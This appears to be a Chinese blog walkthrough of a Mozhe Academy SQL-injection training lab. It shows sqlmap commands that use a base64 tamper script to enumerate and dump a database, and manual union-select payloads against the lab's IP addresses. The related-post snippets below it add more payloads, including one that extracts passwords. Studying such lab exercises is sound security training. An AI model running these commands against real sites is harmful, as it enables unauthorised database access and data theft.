墨者mysql注入_SQL注入实战-MySQL-墨者学院

最新推荐文章于 2024-07-25 07:52:14 发布
最新推荐文章于 2024-07-25 07:52:14 发布
阅读量231 收藏 1
点赞数
文章标签: 墨者mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29311017/article/details/113241078
版权
本文介绍了两种SQL注入方法来渗透MySQL数据库。第一种使用SQLMap自动化工具,通过tamper插件base64encode.py获取数据库、表和字段信息。第二种方法是手工注入,通过对URL中的base64编码进行解码和SQL语句加密,验证注入漏洞并利用order by进行数据猜测。
摘要由CSDN通过智能技术生成

SQL注入实战-MySQL

今天我将用两种方法来讲解,第一种,SQLMap自动化跑数据库,第二种,利用火狐的hackbar来手工注入。

【第一种】

1.先看这个url:http://219.153.49.228:45709/show.php?id=MQo=,一般来说都是id=一个数字,这个MQo=是属于base64加密,加密规律、规则请参考百度百科。

2.用SQLMap的tamper插件,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –dbs –level 3(SQLMap下有tamper这个文件夹,下面有base64encode.py这个插件),可以看到爆出来两个数据库。

a307b0f5198f2e70636dff7e17fb8c92.png

2.继续爆表,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –table -D test –level 3,爆出来data这个表

a04980ad4caa89c8f1a7bf035aa71b51.png

3.继续爆字段,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py –columns -T data -D test –level 3,爆出来main这个字段

0cac0018bc3f8fcc001421a6602ac50d.png

4.开始脱裤,语句:sqlmap.py -u http://219.153.49.228:45709/show.php?id=MQo= –tamper base64encode.py -D test -T data -C main,thekey,title –dump –level 3,脱裤成功,而且在下面这两个文件中都有保存。

23447af0ce4d7cb91fe4a9e7bf6e3434.png

**——————————————————————————————————————————

分割线

——————————————————————————————————————————

**

【第二种】

1.手工注入,前面我们已经说过这个url:http://219.153.49.228:45709/show.php?id=MQo=是经过base64加密的,解密之后我们知道这个MQo=其实是1,这个就需要我们每次注入的时候将正常的SQL语句转换成base64之后再注入,现在我将进行注入,上面的图片是正常一般操作,下面的图片是base64加密之后的,我们要执行的就是下面的加密过了的。

27753a5f55fa8c3cdc396f69333b653a.png

25feca53f1b034574fa511ba0f9e9f09.png

2.分别测试and 1=1和and1=2,发现and 1=2报错,则说明此处存在SQL注入漏洞

3.用order by 2(数字随便改)来进行猜测,order by可以参考:

4.然后用

[http://219.153.49.228:47049/show.php?id=-1%20union%20select%20database%28%29,version%28%29]

加密后的为

[http://219.153.49.228:47049/show.php?id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksdmVyc2lvbigp]

来进行注入

45df0d12b4877d45accc52a019f285cb.png

cce954e03e8a4f42ee123ad453dd0eb2.png

发现这里面有test数据库,继续爆表名

注:这里用-1是为了让它报错的。

还可以用下这句:and exists(select schema_name from information_schema.schemata) 能够正常显示内容,即管理员并没有屏蔽information_schema数据库内容,可以通过此数据库来进行下一步测试

10b65d5a50424d329e3f517607e00091.png

3c50ff32edb017a20eef6f5226a9eccb.png

8.完成。

参考:墨者学院

joshua_clymer
关注
墨者学院SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 870
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4350
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者SQL注入实战-MySQL
wswr的博客
03-14 1897
思路:实话实话,我前面学的能试的都试了,比方单引号,sleep(), and 1=1,宽字节,http注入,甚至对这个请求包进行了各种蹂虐,发现真的只要没有MQo这仨是一定不回显别的,所以我想,这应该不仅仅只是过滤了字符,那要从哪方面再来思考呢,还记得前面学了编码绕过吗,后端了做了字符的过滤,我们用编码绕过,有没有一种可能现在是后端做了编码的限制呢,这个时候我们就可以再考,为什么是id=MQo才能回显,就是说MQo的编码方式是正确,那百度一搜就会发现,MQo对应的base64编码是1,好的,那就破案了,这题
墨者学院SQL注入
最新发布
2401_86440467的博客
07-25 442
进行布尔判断,添加语句and 1=1,页面显示正常,添加语句and 1=2,页面显示出错。证明存在sql注入
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1243
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码。
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 890
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院 --SQL注入实战-MySQL
weixin_45914445的博客
05-30 506
一、粗略判断是否存在sql注入 1.访问链接
墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2275
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
sql注入(2) 墨者学院之SQL手工注入漏洞测试(MySQL数据库-字符型)
c10udz的博客
04-12 4169
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5172
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1229
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2460
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
MYSQL注入
loser的博客
07-23 202
一、显错型注入 需要注意的是,若是想通过匹配库爆表,需要将库名转换成哈希值或者是二进制,否则有些时候会被转义从而报错 一个数据库 information_schema 第一张表 schemate schema_name 第二张表 tables table_name table_schema 第三张表 columns column_name table_name table_schema table_schema: 记录数据库名 table_name: 记录数据表名 1.判断列数 order by
Mysql注入
NULLSET1的博客
12-21 174
-通过错误显示数据库名 http://127.0.0.1/sqlilabs/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),3–+ 查询已知数据库security中的表名 http://127.0.0.1/sqlilabs/sqli-labs-master/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tab
mysql注入
weixin_34365417的博客
04-08 3474
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行. ...
墨者sql注入mysql
09-29
墨者在练习SQL手工注入时,发现PHP代码对客户端提交的参数未做任何过滤,可以利用这个漏洞进行注入。他可以通过两种方法来进行注入。 第一种方法是手工注入墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。 第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户,命令如下: sqlmap -u "http://youIP/new_list.php?id=1" -b --current-db --current-user 然后,他可以继续使用sqlmap来爆破表名,命令如下: sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -tables
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值